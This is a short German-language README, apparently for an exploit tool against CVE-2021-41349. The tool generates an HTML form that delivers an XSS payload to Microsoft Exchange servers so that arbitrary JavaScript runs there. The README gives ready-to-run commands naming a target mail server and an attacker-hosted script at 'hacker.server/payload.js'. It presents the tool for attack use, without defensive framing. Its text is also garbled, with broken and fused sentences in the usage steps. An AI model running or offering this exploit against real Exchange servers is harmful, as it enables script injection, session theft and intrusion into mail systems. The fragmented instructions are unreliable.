
Exploit-Tool für CVE-2021-41349, das ein HTML-Formular generiert, um XSS-Payloads an Microsoft Exchange-Server zu liefern und so die Ausführung beliebigen JavaScripts zu ermöglichen.
Ausnutzung: CVE-2021-41349
Dieses Exploit-Tool erstellt ein Formular zum Posten von XSS-Payloads an den Ziel-Exchange-Server.
Du musst ein js erstellen, das enthält, was du tun möchtest.
js-Payload und lade ihn irgendwo hoch.CVE-2021-41349.py wie in den folgenden Schritten aus.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
oder:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html-Datei auf den Server hoch.